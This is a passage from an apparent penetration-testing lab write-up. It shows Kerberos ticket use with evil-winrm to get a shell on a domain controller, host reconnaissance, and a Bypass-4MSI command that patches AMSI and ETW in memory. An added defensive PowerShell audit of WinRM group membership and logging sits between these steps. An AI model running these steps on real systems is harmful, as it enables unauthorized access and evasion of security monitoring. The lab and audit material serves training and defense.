WinRM
As enumerated previously with BloodHound and ldapdomaindump, the anirudh user, being a member of the Remote Management Users group, is granted WinRM access to the dc.vault.offsec host.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/vault]
└─$ echo -e '[realms]\n\n\tVAULT.OFFSEC = {\n\t\tkdc = dc.vault.offsec\n\t}' | sudo tee /etc/krb5.conf
[realms]
VAULT.OFFSEC = {
kdc = dc.vault.offsec
}
Setting up the /etc/krb5.conf file so the Kerberos ticket can be used against the VAULT.OFFSEC realm.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/vault]
└─$ KRB5CCNAME=anirudh@dc.vault.offsec.ccache evil-winrm -i dc.vault.offsec -r VAULT.OFFSEC
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\anirudh\Documents> whoami
vault\anirudh
*Evil-WinRM* PS C:\Users\anirudh\Documents> hostname
DC
*Evil-WinRM* PS C:\Users\anirudh\Documents> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.187.172
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.187.254
Initial foothold established on the dc.vault.offsec host as the anirudh user via WinRM.
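The foothold above rests entirely on membership of the built-in Remote Management Users group. The following PowerShell snippet is an added audit example (not part of the original writeup or the evil-winrm project) that a domain administrator can run on the DC to see who currently holds that right, flag stale accounts, list the active WinRM listeners, and confirm that PowerShell script block logging is enabled so in-memory tooling of the kind shown later on this page leaves a trace. It assumes the ActiveDirectory RSAT module is installed; the group name comes from the writeup, the 90-day staleness threshold is an arbitrary choice.

```powershell
# Added audit example, not from the original writeup. Run as an administrator on the DC.
# Assumes the ActiveDirectory module (RSAT) is available.
Import-Module ActiveDirectory

# Resolve nested membership: a user may inherit WinRM access through another group.
$members = Get-ADGroupMember -Identity 'Remote Management Users' -Recursive |
    Where-Object { $_.objectClass -eq 'user' } |
    Get-ADUser -Properties LastLogonDate, Enabled, MemberOf |
    Select-Object SamAccountName, Enabled, LastLogonDate,
        @{ Name = 'GroupCount'; Expression = { $_.MemberOf.Count } }

"Accounts with WinRM access via Remote Management Users:"
$members | Format-Table -AutoSize

# Enabled accounts with no logon in 90 days (threshold is an assumption) are removal candidates.
$stale = $members | Where-Object {
    $_.Enabled -and ($_.LastLogonDate -lt (Get-Date).AddDays(-90))
}
if ($stale) {
    Write-Warning 'Enabled accounts with WinRM access and no recent logon:'
    $stale | Format-Table -AutoSize
}

# Show which WinRM listeners are active, so the exposure of the right above can be weighed.
"Active WinRM listeners:"
Get-ChildItem WSMan:\localhost\Listener | Format-Table -AutoSize

# Script block logging (Event ID 4104) is what records PowerShell content run over WinRM,
# including scripts that patch AMSI or ETW in memory before anything else is loaded.
$sbl = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging' `
    -ErrorAction SilentlyContinue
if ($sbl -and $sbl.EnableScriptBlockLogging -eq 1) {
    'Script block logging: enabled'
} else {
    Write-Warning 'Script block logging is not enabled; WinRM PowerShell activity will not be recorded in 4104 events.'
}
```

Membership of this group should be reviewed like any other remote-access right: only accounts with an operational need to manage the DC over WinRM belong in it, and the listener output tells you whether HTTP (5985) or HTTPS (5986) is exposed.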
Bypass-4MSI
*Evil-WinRM* PS C:\Users\anirudh\Documents> Bypass-4MSI
Info: Patching 4MSI, please be patient...
[+] Success!
Info: Patching ETW, please be patient ..
[+] Success!